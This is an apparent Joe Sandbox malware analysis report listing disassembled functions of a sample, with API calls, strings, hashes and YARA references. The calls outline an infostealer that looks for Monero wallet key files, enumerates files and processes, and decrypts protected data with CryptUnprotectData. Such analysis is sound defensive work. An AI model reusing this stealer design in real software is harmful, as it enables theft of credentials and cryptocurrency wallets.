                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 039ab984aaeeeb20018744bff71c12db736840a83cc606718d8d67e8ecd327e2
                              • Instruction ID: 8cd037fbd99b9aacda44b9272e393b3449ec409cbf2ac28e6645f52e5ab29126
                              • Opcode Fuzzy Hash: 039ab984aaeeeb20018744bff71c12db736840a83cc606718d8d67e8ecd327e2
                              • Instruction Fuzzy Hash: 8D414F71940228ABCB24DB94EC99BEEB775FF44700F1041D9E50AA6290DB746FC4CFA1
                              Function 0081E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00830D79), ref: 0081E5A2
                              • StrCmpCA.SHLWAPI(?,008315F0), ref: 0081E5F2
                              • StrCmpCA.SHLWAPI(?,008315F4), ref: 0081E608
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081ECDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: e2882a98b805e480f27be371caaae992eaa69ae87d8af0131958820dba054251
                              • Instruction ID: f2d20aac52222439c04f2efc4e4ee580deb44ddf778d15f89fb7c0e9af0d3d88
                              • Opcode Fuzzy Hash: e2882a98b805e480f27be371caaae992eaa69ae87d8af0131958820dba054251
                              • Instruction Fuzzy Hash: FC1202719101289BCB1CFB64EDA6AED7379FF54310F4045A9A50AE6191EE306BC8CB93
                              Function 00C75E08 Relevance: 9.1, Strings: 6, Instructions: 1640COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: BHg:$_V$as9c$evX/$n/z$v7
                              • API String ID: 0-1227918139
                              • Opcode ID: 5eb6517e854b09ee4d0751c42bd55a7ba214ea4dba3074366c080aec0ee883dc
                              • Instruction ID: 736c75e82cb4488581f878074f4e37eac2e97bf52bcac6d952b3e7d8803cf751
                              • Opcode Fuzzy Hash: 5eb6517e854b09ee4d0751c42bd55a7ba214ea4dba3074366c080aec0ee883dc
                              • Instruction Fuzzy Hash: 2DB22AF390C2149FE3046E2DEC8567ABBEAEF94720F1A453DEAC483744EA3558058797
                              Function 0087F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \u$\u${${$}$}
                              • API String ID: 0-582841131
                              • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                              • Instruction ID: d2e4a54e6cffcb324271f6ca831055a20311782b4fb71d5a78935ae333f0cfdd
                              • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                              • Instruction Fuzzy Hash: 5941A012E09BD9C5CB058B7544A02AEBFB27FD6210F6D82AAC4DD5F383C774814AD3A5
                              Function 0081C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081C971
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081C97C
                              • lstrcat.KERNEL32(?,00830B47), ref: 0081CA43
                              • lstrcat.KERNEL32(?,00830B4B), ref: 0081CA57
                              • lstrcat.KERNEL32(?,00830B4E), ref: 0081CA78
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: a17e6943cb7c33ed8f1f6ddcb745f3e4e1c3849af27b91d99a076e60ad66c795
                              • Instruction ID: 750c84c47f6102e47cc11791eac19e5d0b11e5cbd1a83e45927dd11a23660a42
                              • Opcode Fuzzy Hash: a17e6943cb7c33ed8f1f6ddcb745f3e4e1c3849af27b91d99a076e60ad66c795
                              • Instruction Fuzzy Hash: 6B413DB5D0421E9BDB10CFA4DD99BEEB7B8FF48704F1041A8E609AA280D7745A85CF91
                              Function 00826BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00826C0C
                              • sscanf.NTDLL ref: 00826C39
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C52
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C60
                              • ExitProcess.KERNEL32 ref: 00826C7A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 9d471255cba3021318b9ecb89529f0d68bb0a17657f29c0ef10e79ec7826459b
                              • Instruction ID: 8534dd40029f418d3da4c715a05e542d3c49564d0efea42472262640fab64d83
                              • Opcode Fuzzy Hash: 9d471255cba3021318b9ecb89529f0d68bb0a17657f29c0ef10e79ec7826459b
                              • Instruction Fuzzy Hash: 8A21CD75D14258ABCF08EFE8E9459EEB7B9FF48300F048529E506E7250EB349644CB65
                              Function 008172A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008172AD
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008172B4
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008172E1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00817304
                              • LocalFree.KERNEL32(?), ref: 0081730E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 21327e8fc7d4a34f602a17f49fc1dbdccf073237dc23668b218e358641328c75
                              • Instruction ID: bbace30ea043d0ee18a0e1ebc3c737c412d74ab0ecf94e4f41aac6bbde771eb0
                              • Opcode Fuzzy Hash: 21327e8fc7d4a34f602a17f49fc1dbdccf073237dc23668b218e358641328c75
                              • Instruction Fuzzy Hash: 9D01E975A44308BBDB14DBE4DC46FAE7778EB44B04F104558FB05AA2C0D6B0AA419B65
                              Function 00829790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008297AE
                              • Process32First.KERNEL32(00830ACE,00000128), ref: 008297C2
                              • Process32Next.KERNEL32(00830ACE,00000128), ref: 008297D7
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 008297EC
                              • CloseHandle.KERNEL32(00830ACE), ref: 0082980A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: de6ab280cfcd4ace9a9398d3e53a20a668a8c47748c852a9529da0602868df13
                              • Instruction ID: 46dc9fdba943cfe0585fc7ef714d69e85f33ebe6458081c711e7fbb9593846d6
                              • Opcode Fuzzy Hash: de6ab280cfcd4ace9a9398d3e53a20a668a8c47748c852a9529da0602868df13
                              • Instruction Fuzzy Hash: 2F010C75A14218ABDB20DFA4DD84BDDB7F8FB08700F1446D8E549DA250EB309A81CF50
                              Function 00834573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <7\h$huzx
                              • API String ID: 0-2989614873
                              • Opcode ID: ab1d40ea7e0eeb2e93dffcc38579f2f2ae73fc34c918808c8c92b9b41b718b51
                              • Instruction ID: 8f95b3254a262fa560edc273d1e238435d0de773c8f41c083e3376341724596e
                              • Opcode Fuzzy Hash: ab1d40ea7e0eeb2e93dffcc38579f2f2ae73fc34c918808c8c92b9b41b718b51
                              • Instruction Fuzzy Hash: DE63527241EBD81ECB27CB3087B61517F66FA53210B1D49CEC8C1CB5B3C694AA16E396
                              Function 00C70CD4 Relevance: 6.6, Strings: 4, Instructions: 1599COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /J}w$:cqV$=G=?$>I+_
                              • API String ID: 0-4099484877
                              • Opcode ID: 032d3f18fc4aca5e7941883cc2b40794b241ebee2f2ff67325d5cb9943805b5c
                              • Instruction ID: f11ffae61e3ff2e057d43606127cd134148e80c19cccfacf59e62036faac2847
                              • Opcode Fuzzy Hash: 032d3f18fc4aca5e7941883cc2b40794b241ebee2f2ff67325d5cb9943805b5c
                              • Instruction Fuzzy Hash: 1BB2E4F3A0C2049FE704AE2DEC8567AFBE5EB94720F16493DEAC5C7740EA3558018697
                              Function 00C687FA Relevance: 6.6, Strings: 4, Instructions: 1586COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !Y+u$cq?W$|+p$[/
                              • API String ID: 0-2291234517
                              • Opcode ID: 2ac7f57dbee9ba5420ccd759e54afd65c5f7ecbd9f49eae0c3ec9ecf75d8f2b8
                              • Instruction ID: c62d0b6988e3300786a5fe0bf4fff38badff4ad3934fa0eea0f78d8a88a6e7d9
